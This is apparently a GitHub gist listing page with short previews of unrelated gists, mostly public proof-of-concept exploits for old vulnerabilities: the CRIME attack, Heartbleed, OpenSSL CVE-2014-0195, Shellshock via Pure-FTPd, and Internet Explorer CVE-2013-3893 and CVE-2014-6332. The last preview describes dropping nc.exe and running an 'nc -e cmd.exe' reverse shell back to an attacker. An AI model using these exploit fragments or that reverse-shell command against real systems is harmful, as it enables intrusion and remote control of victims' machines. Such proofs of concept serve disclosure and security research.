This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (asdf:load-system :cffi) | |
| (defpackage :dasm | |
| (:export | |
| ;; type | |
| dword | |
| ;; constant | |
| __LIBDASM_VERSION__ | |
| GET_VERSION_MAJOR | |
| GET_VERSION_MINOR1 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # This is supposedly what CRIME by Juliano Rizzo and Thai Duong will do | |
| # Algorithm by Thomas Pornin, coding by xorninja, improved by @kkotowicz | |
| # http://security.blogoverflow.com/2012/09/how-can-you-protect-yourself-from-crime-beasts-successor/ | |
| import string | |
| import zlib | |
| import sys | |
| import random | |
| charset = string.letters + string.digits + "%/+=" |
tbrianjones
/ free_email_provider_domains.txt
Last active
April 5, 2025 02:20
A list of free email provider domains. Some of these are probably not around anymore. I've combined a dozen lists from around the web. Current "major providers" should all be in here as of the date this is created.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1033edge.com | |
| 11mail.com | |
| 123.com | |
| 123box.net | |
| 123india.com | |
| 123mail.cl | |
| 123qwe.co.uk | |
| 126.com | |
| 150ml.com | |
| 15meg4free.com |
wchen-r7
/ cve_2013_3893_trigger.html
Created
September 30, 2013 01:11
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <script> | |
| function trigger() | |
| { | |
| var id_0 = document.createElement("sup"); | |
| var id_1 = document.createElement("audio"); | |
| document.body.appendChild(id_0); | |
| document.body.appendChild(id_1); | |
| id_1.applyElement(id_0); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email protected]) | |
| # The author disclaims copyright to this source code. | |
| # | |
| # Modified slightly by Andreas Thienemann <[email protected]> for clearer exploit code | |
| # and 64k reads | |
| # | |
| # This version of the exploit does write received data to a file called "dump" in the local directory | |
| # for analysis. |
epixoip
/ cloudflare_challenge
Last active
December 2, 2023 11:53
How I obtained the private key for www.cloudflarechallenge.com
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| I wasn't first to get the key. Nor was I second, third, or even fourth. I'm probably not even the | |
| 10th to get it (ok, looks like I was the 8th.) But I'm happy that I was able to prove to myself | |
| that I too could do it. | |
| First, I have to admit I was a skeptic. Like the handful of other dissenters, I had initially | |
| believed that it would be highly improbable under normal conditions to obtain the private key | |
| through exploiting Heartbleed. So this was my motivation for participating in Cloudflare's | |
| challenge. I had extracted a lot of other things with Heartbleed, but I hadn't actually set out to | |
| extract private keys. So I wanted to see first-hand if it was possible or not. |
hugsy
/ CVE-2014-0195.py
Created
June 10, 2014 05:54
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| # | |
| # OpenSSL heap overflow PoC | |
| # Found by ZDI - ZDI-14-173 // CVE-2014-0195 | |
| # PoC by @_hugsy_ | |
| # | |
| # Ref: https://tools.ietf.org/html/rfc6347 | |
| # | |
| import socket, struct |
jedisct1
/ pureftpd shellshock.txt
Last active
August 8, 2023 20:07
Pure-FTPd + external authentication handler #shellshock POC
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ cat > /tmp/handler.sh | |
| #! /bin/bash | |
| echo auth_ok:1 | |
| echo uid:42 | |
| echo gid:21 | |
| echo dir:/tmp | |
| echo end | |
| ^D | |
| $ chmod +x /tmp/handler.sh |
worawit
/ cve-2014-6332_win7_ie11_poc.html
Last active
March 30, 2024 15:03
CVE-2014-6332 PoC to get shell or bypass protected mode
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <!-- | |
| CVE-2014-6332 PoC to get meterpreter shell or bypass IE protected mode | |
| - Tested on IE11 + Windows 7 64-bit | |
| References: | |
| - original PoC - http://www.exploit-db.com/exploits/35229/ | |
| - http://blog.trendmicro.com/trendlabs-security-intelligence/a-killer-combo-critical-vulnerability-and-godmode-exploitation-on-cve-2014-6332/ | |
| - http://security.coverity.com/blog/2014/Nov/eric-lippert-dissects-cve-2014-6332-a-19-year-old-microsoft-bug.html |
worawit
/ cve-2014-6332_exploit.html
Last active
March 30, 2024 15:02
CVE-2014-6332 IE exploit to get shell (packed everything in one html)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <!-- | |
| CVE-2014-6332 exploit to bypass IE protected mode if enabled (with localhost) then get shell | |
| The exploit drops nc.exe then execute "nc -e cmd.exe -n ip port" | |
| 'server_ip' and 'server_port' in javascript below determined the connect back target | |
| Tested on | |
| - IE11 + Windows 7 64-bit (EPM is off) | |
| - IE11 + Windoes 8.1 64-bit (EPM is off) |
OlderNewer